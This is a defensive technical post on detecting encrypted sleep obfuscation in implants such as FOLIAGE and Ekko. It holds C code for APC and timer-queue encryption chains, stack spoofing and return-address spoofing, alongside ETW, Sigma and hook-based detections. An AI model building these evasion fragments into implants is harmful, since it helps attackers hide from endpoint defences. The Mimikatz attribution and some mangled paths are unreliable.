Hunting Sleeping Giants: Detecting Encrypted Beacon Sleep Obfuscation

Memory scanning for sleeping implants worked until the 2017 release of Gargoyle. It works less with every year that passes. The assumption built into YARA-based scanning, BeaconEye, Moneta, and most commercial EDR memory inspection is that a beacon between callbacks is readable: the shellcode is present, the config is there, the strings are findable. Against any implant implementing sleep obfuscation those assumptions break completely. Between callbacks the code is either encrypted in place, hidden behind non-executable permissions, or both. Pattern matching hits nothing. Attribute scanning finds nothing executable to flag. The beacon is alive and functional and your scanner returned clean.

This post covers the full lineage from Gargoyle through FOLIAGE and Ekko: how each technique works mechanically at the API and memory level, where each one was wrong about what defenders could see, and the specific detection primitives that catch them despite the evasion. The primary source for technique accuracy is Kyle Avery’s DEF CON 30 presentation and accompanying BHIS post. Where source code and documentation conflict, the Avery primary source takes precedence.

What memory scanners actually look at

Understanding what you can detect requires understanding what the tools look at. Memory scanners operate across three distinct detection primitives, and sleep obfuscation techniques are designed to defeat all three.

Pattern matching is the most widely understood capability. YARA scans all memory allocated by a target process and matches string, byte, and logical patterns against that content. BeaconEye builds on YARA specifically by restricting its scan to heap memory, searching for the Cobalt Strike configuration structures dynamically allocated at beacon initialization. Commercial products including Carbon Black and CrowdStrike explicitly use YARA for in-memory detection. Any technique that makes pattern content unreadable or unrecognizable defeats this layer entirely.

Memory attribute scanning looks at the properties of allocated regions rather than their content. Moneta scans for memory that is simultaneously executable and privately committed: executable because all code must be executable, private commit because legitimate code on Windows is loaded from disk as image commit rather than dynamically allocated. JIT environments such as .NET and web browsers create legitimate executable private commit memory, but outside those contexts it is a strong indicator. Moneta also checks the start address of all threads for private commit: if the thread start address is in private memory, the thread was created to execute injected code. This specific check is simple to evade by creating a suspended thread with an image commit start address and then redirecting it, which is why the more useful signal is page permissions rather than thread start addresses. PE-sieve similarly scans for executable private memory but focuses on return addresses: it checks the return address of all threads to see if they point to private commit memory.

Stack tracing is the most recent addition. BeaconHunter and Hunt-Sleeping-Beacons operate on the observation that beacons using Sleep or NtDelayExecution to wait between callbacks set the thread wait reason to DelayExecution. Enumerating all threads and flagging those in a DelayExecution wait state with private commit memory anywhere in their call stack catches naive implementations reliably. MalMemDetect takes a different approach to stack tracing by hooking specific API calls at runtime, RtlAllocateHeap, NtWaitForSingleObject, and InternetConnectA among others, and checking the return address on the stack at the moment of each call. When a beacon calls one of those APIs, the return address points back into its shellcode, which is in private commit memory. The hook catches it at execution time regardless of what happens to the memory during sleep.

Gargoyle: the technique that started it

Josh Lospinoso’s 2017 Gargoyle proof of concept established the foundational approach that everything since has built on. The core insight is that code does not need to be executable while it is not executing. During the sleep window between beacon callbacks, the shellcode region can be marked PAGE_READWRITE or PAGE_NOACCESS, making it invisible to scanners that restrict their search to executable memory. A timer or APC callback wakes the code, a ROP gadget restores execute permissions, the code runs its callback, and the cycle repeats.

Gargoyle was 32-bit only. The ROP gadgets used were chosen from image commit DLLs to avoid placing executable code in private commit memory, which was the key insight for defeating attribute-based scanning. The technique required specific gadget offsets that varied across Windows versions, creating portability problems. Waldo-irc later released YouMayPasser, a ready-to-use 64-bit Gargoyle implementation for Cobalt Strike that uses VEH (Vector Exception Handler) and hardware breakpoints to hook API calls. thefLinkk released DeepSleep, an APC-less implementation using ROP only. These extended the approach to 64-bit Windows and to production implant frameworks, but the underlying primitive remained the same: hide in non-executable memory between callbacks.

// Gargoyle primitive: the protection cycle that everything since has used
// During execution: PAGE_EXECUTE_READ (0x20)
// During sleep: PAGE_READWRITE (0x04) or PAGE_NOACCESS (0x01)
// 
// The timer or APC fires and triggers a ROP chain that calls VirtualProtect
// to restore execute permissions before the beacon code runs
//
// Detection implication: any technique in this family must change page
// protections at least twice per sleep cycle (once to hide, once to restore)
// This is the invariant that ETW detection exploits

SystemFunction032: why the encryption must stay in image commit memory

Encrypting shellcode solves the pattern matching problem. A beacon that XORs its code section during sleep cannot be matched by YARA rules searching for known byte sequences. But the code performing the encryption cannot itself be in private executable memory or Moneta flags it. Everything in the obfuscation chain must execute from image commit memory, which means system DLLs.

SystemFunction032 is an RC4 implementation exported from advapi32.dll. Lospinoso’s use in Mimikatz brought it to wider attention. It accepts two ustring arguments, one for the target data and one for the key, and performs RC4 encryption or decryption in place. Since RC4 is symmetric both operations use the same function. The implementation is in advapi32.dll, which is image commit memory in every process, so calling it from a ROP chain or NtContinue context never requires executing code from private commit memory.

// SystemFunction032: RC4 from advapi32.dll, both encrypt and decrypt
// Used for DATA and HEAP encryption where code must stay in image commit

typedef NTSTATUS (WINAPI* pSF032)(struct ustring*, struct ustring*);
pSF032 Sf032 = (pSF032)GetProcAddress(GetModuleHandle("advapi32.dll"), "SystemFunction032");

// Technically SystemFunction032 is encryption, SystemFunction033 is decryption
// RC4 is bidirectional so either works for both operations

struct ustring {
    DWORD  Length;
    DWORD  MaximumLength;
    PUCHAR Buffer;
};

// For heap data encryption (BeaconEye bypass context)
struct ustring heap_data;
heap_data.Buffer        = (PUCHAR)heap_allocation_base;
heap_data.Length        = heap_allocation_size;
heap_data.MaximumLength = heap_allocation_size;

struct ustring key;
key.Buffer        = (PUCHAR)rc4_key_bytes;
key.Length        = key_size;
key.MaximumLength = key_size;

Sf032(&heap_data, &key);   // Encrypt heap in place from advapi32.dll
// Sf032 again with same key to decrypt (RC4 symmetric)

Detection implication: SystemFunction032 is called legitimately in many processes. What is unusual is its call origin. When it is called from a thread whose return address is in private commit memory, or when it is called in rapid succession on large blocks of code section memory rather than small heap allocations, the context is suspicious. MalMemDetect catches the private commit return address at call time. Process Monitor captures the API call sequence for offline correlation.

Heap encryption and the BeaconEye problem

Encrypting code solves pattern matching against code sections. BeaconEye specifically scans heap allocations for Cobalt Strike configuration structures, which are dynamically allocated at beacon startup and persist on the heap throughout the implant’s lifetime. Making the code non-executable during sleep does not affect heap content visibility at all.

Kyle Avery’s AceLdr addresses this with a secondary heap approach derived from his earlier TitanLdr fork. Rather than tracking individual heap entries for encryption, the implementation creates a new heap before Cobalt Strike beacon initializes. GetProcessHeap in the implant’s IAT is hooked to redirect beacon heap allocations to this secondary heap. Since only beacon code uses the secondary heap, encrypting all entries on it with SystemFunction032 at sleep time covers the entire beacon configuration without needing to track which allocations belong to the beacon. At scanner time during sleep the heap entries are encrypted ciphertext with no recognizable structure, defeating BeaconEye’s config structure pattern matching entirely.

// Secondary heap approach for BeaconEye bypass (AceLdr implementation concept)
// The secondary heap is created before beacon initializes

HANDLE hSecondaryHeap = HeapCreate(0, 0, 0);

// GetProcessHeap in beacon's IAT is patched to return hSecondaryHeap
// All beacon allocations now go to the secondary heap
// At sleep time, walk the secondary heap and encrypt all entries

PROCESS_HEAP_ENTRY entry;
entry.lpData = NULL;
while (HeapWalk(hSecondaryHeap, &entry)) {
    if (entry.wFlags & PROCESS_HEAP_ENTRY_BUSY) {
        // Encrypt this allocation with SystemFunction032
        EncryptWithSF032(entry.lpData, entry.cbData, rc4_key);
    }
}

// After sleep: walk again and decrypt all entries before beacon continues
// BeaconEye scanning during sleep finds only encrypted blobs, not CS config structures

FOLIAGE: NtContinue chains and KsecDD encryption

Austin Hudson’s FOLIAGE moved the execution chain away from ROP gadgets with version-specific offsets by using NtContinue directly. NtContinue is the NTAPI routine used in exception handling to restore a thread’s execution context. It accepts a CONTEXT structure and restores all register values including RIP, then continues execution from whatever RIP specifies. Any code that can be expressed as a function address and register setup can be called via NtContinue without needing a ROP gadget chain specific to the target Windows version.

FOLIAGE queues a series of user-mode APCs via NtQueueApcThread, each passing NtContinue as the APC routine and a CONTEXT structure pointer as the argument. When the target thread enters an alertable wait state, each APC fires in sequence, with NtTestAlert placed at the top of each context stack to force the thread back into alertable state so the next APC in the chain can fire immediately. The setup phase and execution chain are distinct: setup happens before the APCs are queued, execution happens when each APC fires.

The FOLIAGE setup phase, per Kyle Avery’s analysis of Austin Hudson’s implementation:
1. Opens a handle to the KsecDD driver for kernel-level encryption
2. Opens a handle to the current thread to modify its context
3. Creates a new thread to serve as the APC queue target
4. Creates an event object to keep the new thread from exiting prematurely
5. Copies the context of the new thread into a new context structure as the basis for the chain

The FOLIAGE sleep chain, executed as each queued APC fires:
1. Waits on the event object to keep the new thread alive
2. Changes the beacon’s memory to non-executable
3. Instructs the KsecDD driver to encrypt the beacon memory
4. Saves the context of the original beacon thread
5. Sets the original thread’s context to a manufactured fake context (at-rest stack spoofing)
6. Sleeps for the specified duration using NtDelayExecution
7. Instructs the KsecDD driver to decrypt the beacon memory
8. Restores the original beacon thread’s context
9. Changes the beacon’s memory back to executable
10. Exits the new APC thread

// FOLIAGE: KsecDD driver usage for kernel-level encryption
// KsecDD is the Kernel Security Support Provider Interface driver at DeviceKsecDD
// FOLIAGE opens a handle to it and uses IOCTL calls to encrypt/decrypt memory
// This allows encryption to happen in kernel mode without needing user-mode
// write permissions on the target memory region

// Opening the KsecDD handle (setup phase, not the sleep chain)
HANDLE hKsecDD;
UNICODE_STRING uDriverPath;
OBJECT_ATTRIBUTES oa;
IO_STATUS_BLOCK isb;

RtlInitUnicodeString(&uDriverPath, L"\Device\KsecDD");
InitializeObjectAttributes(&oa, &uDriverPath, OBJ_CASE_INSENSITIVE, NULL, NULL);

NtCreateFile(&hKsecDD,
    FILE_READ_DATA | FILE_WRITE_DATA | SYNCHRONIZE,
    &oa, &isb, NULL, 0,
    FILE_SHARE_READ | FILE_SHARE_WRITE,
    FILE_OPEN, FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0);

// The KsecDD IOCTL for encryption operates in kernel space
// This is why FOLIAGE does NOT use SystemFunction032 for code encryption
// KsecDD can access and transform the memory from kernel mode regardless of
// the user-mode page permission state at the time of the call

// FOLIAGE APC queue: NtContinue as APC routine, CONTEXT as argument
typedef NTSTATUS (NTAPI* pNtQueueApcThread)(HANDLE, PVOID, PVOID, PVOID, PVOID);
pNtQueueApcThread NtQueueApcThread = (pNtQueueApcThread)
    GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueueApcThread");

typedef NTSTATUS (NTAPI* pNtContinue)(PCONTEXT, BOOL);
pNtContinue NtContinue = (pNtContinue)
    GetProcAddress(GetModuleHandle("ntdll.dll"), "NtContinue");

// Each step in the chain is queued as an APC
// APC routine = NtContinue, APC argument = pointer to CONTEXT for this step
// NtTestAlert at the top of each CONTEXT stack forces the thread alertable
// so the next APC fires immediately after the current step completes

NtQueueApcThread(hNewThread, (PVOID)NtContinue, &ctx_change_noexec, NULL, NULL);
NtQueueApcThread(hNewThread, (PVOID)NtContinue, &ctx_ksecdd_encrypt, NULL, NULL);
NtQueueApcThread(hNewThread, (PVOID)NtContinue, &ctx_save_context,   NULL, NULL);
NtQueueApcThread(hNewThread, (PVOID)NtContinue, &ctx_fake_context,   NULL, NULL);
NtQueueApcThread(hNewThread, (PVOID)NtContinue, &ctx_delay_exec,     NULL, NULL);
NtQueueApcThread(hNewThread, (PVOID)NtContinue, &ctx_ksecdd_decrypt, NULL, NULL);
NtQueueApcThread(hNewThread, (PVOID)NtContinue, &ctx_restore_ctx,    NULL, NULL);
NtQueueApcThread(hNewThread, (PVOID)NtContinue, &ctx_change_exec,    NULL, NULL);

// Signal the event to start the chain
SetEvent(hChainStartEvent);

The critical distinction from Ekko: FOLIAGE uses the KsecDD kernel driver for code section encryption, not SystemFunction032. This is a deliberate design choice: KsecDD operates in kernel mode and can encrypt the memory region regardless of its user-mode page permissions. FOLIAGE does not need to change the beacon memory to PAGE_READWRITE before encrypting it because KsecDD does not need user-mode write access. The protection chain is non-executable during sleep, without the RW intermediate step that Ekko requires.

Ekko: timer queues, SystemFunction032, and the RW window

C5pider’s Ekko, released after reversing MDSec NightHawk, replaces FOLIAGE’s APC queue mechanism with Windows timer queues via CreateTimerQueueTimer. The fundamental goal is the same: execute a chain of operations during sleep without leaving executable private commit memory readable by scanners. The implementation differs in its trigger mechanism, encryption method, and the memory state visible during sleep.

Ekko creates a timer queue, then schedules callbacks at 100ms intervals. Each timer callback calls NtContinue with a CONTEXT structure defining one step in the sleep chain. The first timer fires at T+0 and calls RtlCaptureContext rather than NtContinue, capturing the current thread’s register state as the basis for all subsequent context structures. From the Ekko source directly:

// Ekko.c - the actual timer queue setup (from Cracked5pider/Ekko on GitHub)
// First: RtlCaptureContext at T+0 to capture thread state
CreateTimerQueueTimer(&hNewTimer, hTimerQueue,
    RtlCaptureContext,          // NOT NtContinue for the first call
    &CtxThread,                 // Writes captured context here
    0, 0, WT_EXECUTEINTIMERTHREAD);

// Then WaitForSingleObject to give RtlCaptureContext time to fire
WaitForSingleObject(hEvent, 0x32);

// Context structures for each step are copies of CtxThread
// with Rip and Rsp modified for the target operation
CopyMemory(&RopProtRW, &CtxThread, sizeof(CONTEXT));
CopyMemory(&RopMemEnc, &CtxThread, sizeof(CONTEXT));
CopyMemory(&RopDelay,  &CtxThread, sizeof(CONTEXT));
CopyMemory(&RopMemDec, &CtxThread, sizeof(CONTEXT));
CopyMemory(&RopProtRX, &CtxThread, sizeof(CONTEXT));
CopyMemory(&RopSetEvt, &CtxThread, sizeof(CONTEXT));

// Each step's Rip is set to the target function address
// Each step's Rsp is adjusted to pass the correct arguments

// The actual timer chain (100ms intervals):
// T+100ms: RopProtRW  -> VirtualProtect(beacon, size, PAGE_READWRITE, &OldProt)
CreateTimerQueueTimer(&hNewTimer, hTimerQueue, NtContinue, &RopProtRW,
    100, 0, WT_EXECUTEINTIMERTHREAD);

// T+200ms: RopMemEnc  -> SystemFunction032(encrypt beacon code)
CreateTimerQueueTimer(&hNewTimer, hTimerQueue, NtContinue, &RopMemEnc,
    200, 0, WT_EXECUTEINTIMERTHREAD);

// T+300ms: RopDelay   -> WaitForSingleObject(hEvent, sleep_duration)
// This is the actual sleep - WaitForSingleObject sets UserRequest, not DelayExecution
CreateTimerQueueTimer(&hNewTimer, hTimerQueue, NtContinue, &RopDelay,
    300, 0, WT_EXECUTEINTIMERTHREAD);

// T+400ms: RopMemDec  -> SystemFunction032(decrypt beacon code)
CreateTimerQueueTimer(&hNewTimer, hTimerQueue, NtContinue, &RopMemDec,
    400, 0, WT_EXECUTEINTIMERTHREAD);

// T+500ms: RopProtRX  -> VirtualProtect(beacon, size, PAGE_EXECUTE_READ, &OldProt)
CreateTimerQueueTimer(&hNewTimer, hTimerQueue, NtContinue, &RopProtRX,
    500, 0, WT_EXECUTEINTIMERTHREAD);

// T+600ms: RopSetEvt  -> SetEvent(hEvent) to wake the main thread
CreateTimerQueueTimer(&hNewTimer, hTimerQueue, NtContinue, &RopSetEvt,
    600, 0, WT_EXECUTEINTIMERTHREAD);

// Main thread waits on hEvent for the full chain to complete
WaitForSingleObject(hEvent, INFINITE);

Ekko protection cycle is RX → RW → [encrypted sleep] → RW → RX. Unlike FOLIAGE there is no NOACCESS step in the basic implementation. Ekko must change to PAGE_READWRITE before calling SystemFunction032 because the encryption is done by user-mode code in advapi32.dll rather than a kernel driver. During the sleep window the memory is PAGE_READWRITE and contains RC4-encrypted ciphertext. It is readable if a scanner can access it, but there are no recognizable patterns to match. It is not executable, which is why Moneta does not flag it as suspicious executable private memory during the sleep window.

The RW window is a detection opportunity that FOLIAGE does not share. Between the VirtualProtect call setting PAGE_READWRITE and the SystemFunction032 call completing the encryption, there is a brief window where the beacon code is readable and writable but not yet encrypted. The same window exists in reverse during decryption. ETW page protection events capture both transitions regardless of how brief they are.

Evading Sleep-based detection: WaitForSingleObject instead of Sleep

BeaconHunter and the initial version of Hunt-Sleeping-Beacons used a straightforward heuristic: enumerate all threads, find those with a wait reason of DelayExecution, and investigate them for signs of shellcode in their call stacks. This caught beacons using Sleep() or NtDelayExecution directly, which was most implementations.

The evasion is replacing Sleep with WaitForSingleObject. WaitForSingleObject sets the thread wait reason to UserRequest rather than DelayExecution. This one API substitution rendered the first-generation sleep-based detection tools ineffective. Kyle Avery demonstrated this as a standalone bypass before incorporating it into the FOLIAGE and AceLdr implementations. Note that in Ekko, WaitForSingleObject is used as the sleep mechanism inside the RopDelay step of the timer chain, so Ekko inherently sets UserRequest wait reason rather than DelayExecution.

// Naive sleep implementation: detectable by BeaconHunter and original HSB
Sleep(sleep_duration_ms);
// Sets thread WaitReason = DelayExecution
// Caught by any scanner looking for DelayExecution threads

// NtDelayExecution: same wait reason
NtDelayExecution(FALSE, &delay_interval);
// Also sets WaitReason = DelayExecution

// Replacement: WaitForSingleObject on a waitable object
HANDLE hWait = CreateWaitableTimer(NULL, TRUE, NULL);
WaitForSingleObject(hWait, sleep_duration_ms);
// Sets thread WaitReason = UserRequest
// Bypasses DelayExecution-based detection in BeaconHunter and HSB v1

// Detection: neither Sleep nor WaitForSingleObject is inherently suspicious
// The signal is the combination of UserRequest wait reason, private commit
// memory in the call stack, and the specific dispatcher present (APC or timer)
// which Hunt-Sleeping-Beacons v2 detects

Return address spoofing at rest

PE-sieve checks the return addresses of all threads. When a beacon thread is parked in WaitForSingleObject during sleep, if its call stack contains return addresses pointing to private commit memory, PE-sieve flags it. The at-rest problem is how to make the thread’s call stack look clean during the sleep window without executing code from private commit memory to do the cleaning.

The simplest approach, demonstrated in ThreadStackSpoofer, is overwriting the return address on the stack with zero. This truncates the visible call stack. The limitation is that depending on the stack state, this technique can leave argument values on the stack that happen to resemble memory addresses, which can itself be an indicator. It is also brittle: the zero return address will cause a crash if the thread tries to return normally before it is restored.

FOLIAGE implements a more stable approach using NtSetContextThread. Step 5 of the FOLIAGE sleep chain uses NtSetContextThread to overwrite the original beacon thread’s context with a manufactured context that sets the RIP and call stack to values that appear to come from legitimate system code. When PE-sieve or any other tool walks the stack of the original thread during the sleep window, it sees the manufactured context rather than the real one. Kyle Avery noted at the time of the presentation that NtSetContextThread use in this context was not generating alerts from open-source scanners or commercial security products, though it remains a potential detection point for tooling that specifically monitors context manipulation.

// FOLIAGE at-rest stack spoofing: NtSetContextThread
// Happens in step 5 of the sleep chain after saving the original context

typedef NTSTATUS (NTAPI* pNtSetContextThread)(HANDLE, PCONTEXT);
pNtSetContextThread NtSetContextThread = (pNtSetContextThread)
    GetProcAddress(GetModuleHandle("ntdll.dll"), "NtSetContextThread");

// Manufactured context: RIP and call stack point to legitimate Windows code
CONTEXT fakeContext;
memset(&fakeContext, 0, sizeof(CONTEXT));
fakeContext.ContextFlags = CONTEXT_FULL;

// Point RIP at a legitimate-looking location inside ntdll or kernel32
fakeContext.Rip = (DWORD64)GetProcAddress(GetModuleHandle("ntdll.dll"),
                                            "RtlUserThreadStart");

// Stack frames point to ntdll addresses, not beacon code
// PE-sieve walking this context sees only image commit return addresses

NtSetContextThread(hOriginalBeaconThread, &fakeContext);

// At wake time (step 8 of the chain): restore the saved real context
// hRealContext was saved in step 4
NtSetContextThread(hOriginalBeaconThread, &hRealContext);

Return address spoofing at execution

At-rest spoofing covers the period when the beacon thread is parked in WaitForSingleObject. At-execution spoofing covers the other problem: when the beacon is running and makes an API call, the return address pushed onto the stack by the CALL instruction points back into the beacon’s shellcode, which is in private commit memory. MalMemDetect catches exactly this: it hooks APIs like RtlAllocateHeap and checks the return address at execution time via _ReturnAddress() and GetModuleHandleExA(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS).

namazso’s x64 Return Address Spoofing PoC addresses the at-execution case. Before making a hooked API call, a ROP gadget from a loaded DLL is placed as the return address, which after the API call jumps to a stub that restores the execution context to continue from the real beacon code. The return address visible to a hook checking _ReturnAddress() is inside a legitimate system DLL. GetModuleHandleExA succeeds. MalMemDetect does not alert.

// x64 Return Address Spoofing (namazso PoC, used in AceLdr)
// Before calling a hooked API, the return address is replaced with a
// JMP [rbx] gadget inside ntdll, which bounces through a stub back to beacon

// The stub (concept, from the PoC):
// pop r11              ; Remove the real return address from stack
// add rsp, 8           ; Alignment
// mov rax, [rsp+24h]   ; Load the parameter block pointer
// mov r10, [rax]       ; Load gadget address (JMP [rbx] in ntdll)
// mov [rsp], r10       ; Replace return address with gadget
// mov r10, [rax+8h]    ; Load target API function pointer
// mov [rax+8h], r11    ; Store real return in parameter block
// mov [rax+10h], rbx   ; Save rbx
// lea rbx, [rip+fixup] ; rbx = fixup stub address
// mov [rax], rbx       ; Parameter block[0] = fixup
// mov rbx, rax         ; rbx = parameter block
// jmp r10              ; Jump to target API function
//
// fixup:               ; Called via JMP [rbx] gadget after API returns
// sub rsp, 16
// mov rcx, rbx
// mov rbx, [rcx+10h]   ; Restore rbx
// jmp [rcx+8h]         ; Jump to real return address in beacon code

// AceLdr applies this for three specific APIs:
// InternetConnectA, NtWaitForSingleObject, RtlAllocateHeap
// These are the APIs MalMemDetect hooks

// Detection: search for the stub pattern in process memory
// .search -a 41 5b 48 83 c4 08 4c 8b 44 24 18 (WinDbg)
// pop r11; add rsp,8; mov r10,[rsp+18h] - the stub entry sequence
// Finding this in non-module-backed memory = spoofing stub present

The fundamental limitation that FOLIAGE cannot bypass in the current implementation: Defeating Hunt-Sleeping-Beacons v2’s KiUserApcDispatcher detection requires spoofing the return addresses of API calls made within the APC sleep chain itself, at execution time. This requires the at-execution spoofing stub to be callable during the sleep chain. But FOLIAGE’s own sleep chain is what is performing the code obfuscation. The spoofing stub is inside the shellcode that gets encrypted and marked non-executable. The APC thread cannot call a stub that is currently non-executable. Kyle Avery notes this explicitly: the public FOLIAGE implementation cannot bypass the updated Hunt-Sleeping-Beacons because the call stack spoofing code is itself obfuscated by the technique it would need to call.

Detection 1: Hunt-Sleeping-Beacons and call stack analysis

Hunt-Sleeping-Beacons (thefLinkk) went through two generations of detection as evasion improved. The first generation looked for threads in DelayExecution state with private commit memory in their call stacks. The WaitForSingleObject substitution bypassed this by changing the wait reason to UserRequest.

The updated version detects FOLIAGE by enumerating all threads in UserRequest wait state and checking their call stacks for a return address to KiUserApcDispatcher. When FOLIAGE queues APCs via NtQueueApcThread and one fires, the kernel delivers it through KiUserApcDispatcher. That dispatcher address appears in the call stack of the APC thread during execution. A thread in UserRequest state with KiUserApcDispatcher on its call stack has received an APC that is now executing WaitForSingleObject, which is exactly the FOLIAGE sleep pattern.

For Ekko, Hunt-Sleeping-Beacons uses a parallel detection: it locates the timer callback dispatcher in ntdll by queuing its own timer callback and using RtlCaptureContext to walk its own stack and identify the dispatcher address. It then enumerates threads in UserRequest state and looks for a return address to that timer dispatcher. A timer pool thread executing a WaitForSingleObject call via an NtContinue CONTEXT is exactly the Ekko pattern. MSDN explicitly states timer callbacks should not be blocking, so a blocking WaitForSingleObject inside a timer callback is inherently anomalous.

// Hunt-Sleeping-Beacons v2 detection output (from project README)
// Run: Hunt-Sleeping-Beacons.exe

// FOLIAGE/AceLdr detection:
// [*] Now enumerating all threads in state Wait:UserRequest
// [*] Found 783 threads, checking for APC-triggered delays...
// [!] Possible Foliage identified in process: 16436
//     Thread 15768 Wait:UserRequest triggered by KiUserApcDispatcher
// [*] End

// Ekko detection:
// [!] Possible Ekko-style obfuscation in process: 12840
//     Thread 9104 Wait:UserRequest triggered by timer callback dispatcher

// WinDbg: manually inspect a flagged thread
.process /p /r [eprocess_address]
.thread [thread_address]
k            // Full call stack
// Look for: KiUserApcDispatcher or TppTimerCallback in the frames
// Look for: WaitForSingleObject called from one of those dispatchers

// The tell: legitimate WaitForSingleObject calls from timer callbacks
// do not appear in normal Windows processes. This is the abnormal behavior.

Detection 2: Page protection transitions via ETW

Every sleep obfuscation implementation in this lineage must change page protections. FOLIAGE changes to non-executable before encrypting and back to executable after decrypting. Ekko changes to PAGE_READWRITE before encrypting and back to PAGE_EXECUTE_READ after decrypting. Neither can avoid this. The encryption step requires a different permission state than the execution state, and the transition between them is the invariant that ETW captures.

Microsoft-Windows-Kernel-Memory EventID 98 fires on every NtProtectVirtualMemory call and records the process, address range, old protection, and new protection. No userland hook can intercept this event because it fires in the kernel before returning to user mode. The Ekko-specific signature is PAGE_EXECUTE_READ (0x20) to PAGE_READWRITE (0x04) followed by PAGE_READWRITE to PAGE_EXECUTE_READ on the same address within the beacon sleep interval. The FOLIAGE-specific signature is PAGE_EXECUTE_READ to PAGE_NOACCESS (0x01) and back. Both cycle multiple times per session at the beacon’s configured sleep interval, making timing correlation possible.

// ETW trace setup for VirtualMemory protection monitoring
// Requires administrator privileges

logman create trace SleepObfTrace -p "Microsoft-Windows-Kernel-Memory" 0xFFFF 0xFF -o C:huntvm.etl -ets
// Let run while suspected beacon is active (minimum one full sleep cycle)
logman stop SleepObfTrace -ets

// Parse and look for the protection cycling pattern
Get-WinEvent -Path C:huntvm.etl |
    Where-Object EventID -eq 98 |
    ForEach-Object {
        [PSCustomObject]@{
            Time      = $_.TimeCreated
            PID       = $_.Properties[0].Value
            Address   = "0x{0:X16}" -f [uint64]$_.Properties[1].Value
            Size      = $_.Properties[2].Value
            OldProt   = "0x{0:X}" -f $_.Properties[3].Value
            NewProt   = "0x{0:X}" -f $_.Properties[4].Value
        }
    } |
    Sort-Object PID, Address, Time |
    Export-Csv C:huntprot_changes.csv -NoTypeInformation

// Now find processes with the Ekko cycle (RX->RW->RX) on same address
Import-Csv C:huntprot_changes.csv |
    Group-Object PID, Address |
    Where-Object {
        $transitions = $_.Group | ForEach-Object { "$($_.OldProt)->$($_.NewProt)" }
        ($transitions -contains "0x20->0x4") -and ($transitions -contains "0x4->0x20")
    } |
    Select-Object Name, Count

// Sigma rule for Ekko-style protection cycling
// Requires ETW Microsoft-Windows-Kernel-Memory EventID 98 forwarded to SIEM

title: Ekko Sleep Obfuscation Page Protection Cycling
id: a1b2c3d4-0000-0000-0000-000000000001
status: experimental
description: >
    Detects the RX->RW->RX page protection cycle specific to Ekko-style timer
    queue sleep obfuscation. Legitimate JIT compilers (CLR, V8) may transition
    RW/RX but will not cycle rapidly on the same address at beacon-interval timing.
logsource:
    product: windows
    category: virtual_memory_protection
detection:
    selection:
        EventID: 98
    filter_system:
        ProcessId: 4
    filter_jit:
        Image|endswith:
            - 'dotnet.exe'
            - 'node.exe'
            - 'chrome.exe'
            - 'msedge.exe'
    condition: selection and not filter_system and not filter_jit
falsepositives:
    - JIT compilers such as dotnet and V8 may trigger RW/RX transitions but will
      not cycle to NOACCESS or repeat at consistent beacon-sleep intervals
level: medium
tags:
    - attack.defense_evasion
    - attack.t1622
notes: >
    Correlate on same PID and Address within 60s window.
    Transitions 0x20->0x04 followed by 0x04->0x20 = Ekko signature.
    Transitions 0x20->0x01 followed by 0x01->0x20 = FOLIAGE signature.
    Both patterns repeating at consistent intervals = high confidence beacon.

Detection 3: MalMemDetect and return address validation at API call time

MalMemDetect hooks specific APIs and validates the return address at the moment each API is called. The hook captures the return address using _ReturnAddress(), which reads the value at the top of the current call stack, and passes it to GetModuleHandleExA with GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS. If the return address falls within any loaded module, the function succeeds and returns a handle. If the address is in private commit memory, the function fails and returns NULL. A NULL return means the caller is not image-backed code.

// MalMemDetect core detection: return address check at API call time
// Hook installed on RtlAllocateHeap, NtWaitForSingleObject, InternetConnectA

LPVOID WINAPI Hooked_RtlAllocateHeap(PVOID hHeap, ULONG dwFlags, SIZE_T dwBytes) {
    LPVOID result = Original_RtlAllocateHeap(hHeap, dwFlags, dwBytes);

    LPVOID callerReturnAddr = _ReturnAddress();  // Address beacon returns to after this call

    HMODULE hMod = NULL;
    BOOL isImageBacked = GetModuleHandleExA(
        GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
        GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT,
        (LPCSTR)callerReturnAddr,
        &hMod
    );

    if (!isImageBacked || hMod == NULL) {
        // Return address is not inside any loaded module = private commit memory
        // The caller is shellcode
        printf("[ALERT] RtlAllocateHeap from unbacked addr 0x%p | TID %lu | Size %zun",
               callerReturnAddr, GetCurrentThreadId(), dwBytes);
    }

    return result;
}

// Real detection output from a CS beacon with Ekko but no at-execution spoofing:
// [ALERT] RtlAllocateHeap from unbacked addr 0x000002C38082B1D0 | TID 12780 | Size 32
// [ALERT] RtlAllocateHeap from unbacked addr 0x000002C383988550 | TID 12780 | Size 27648
// [ALERT] InternetConnectA from unbacked addr 0x000002C38082F344 | TID 12780 | Server: 10.0.0.129
//
// Thread 12780 consistently across all alerts = single beacon thread
// InternetConnectA server = C2 infrastructure pivot point
// Allocation sizes match CS malleable profile heap patterns

The x64 Return Address Spoofing PoC defeats MalMemDetect for the three specific APIs it hooks in AceLdr by ensuring the return address visible to the hook points into ntdll via a JMP gadget rather than into the beacon. However, this only covers the APIs explicitly spoofed. Any additional API call the beacon makes that is also hooked will expose the real return address. Extending MalMemDetect to hook a wider range of APIs increases the coverage against partially-spoofed implementations.

Detection 4: Memory attribute scanning and the private commit signal

Even encrypted and non-executable, the beacon’s memory region retains its allocation attributes throughout the sleep cycle. The VAD (Virtual Address Descriptor) entry in the kernel records whether the region is private commit or image commit regardless of its current page permissions. A region that was allocated with VirtualAlloc remains private commit whether it is currently PAGE_EXECUTE_READ, PAGE_READWRITE, or PAGE_NOACCESS. This is the attribute Moneta and PE-sieve look for.

During the Ekko sleep window the beacon region is PAGE_READWRITE with encrypted content, not executable private memory. Moneta looking for executable private memory will not flag it during this exact window. But before sleep starts and after sleep ends, when the beacon is executing, it is executable private memory and Moneta catches it then. Timing a Moneta scan to coincide with the active window rather than the sleep window is the practical approach for detection. During the FOLIAGE sleep window the region is PAGE_NOACCESS; Moneta attempting to read it gets an access violation but the VAD record showing private commit with recent NOACCESS transition is itself an indicator available to tooling with kernel access.

// Moneta: live memory attribute scanning against running processes
// Run elevated; catches executable private commit during beacon active window

Moneta64.exe -p [suspected_pid] -m Readable
// Output to look for:
// [SUSPICIOUS] Private Rx (no mapped file backing)
// Region: 0x0000025300000000 Size: 0x100000 (1 MB)
// Type: MEM_PRIVATE  Protect: PAGE_EXECUTE_READ
// No associated module in PEB loader list

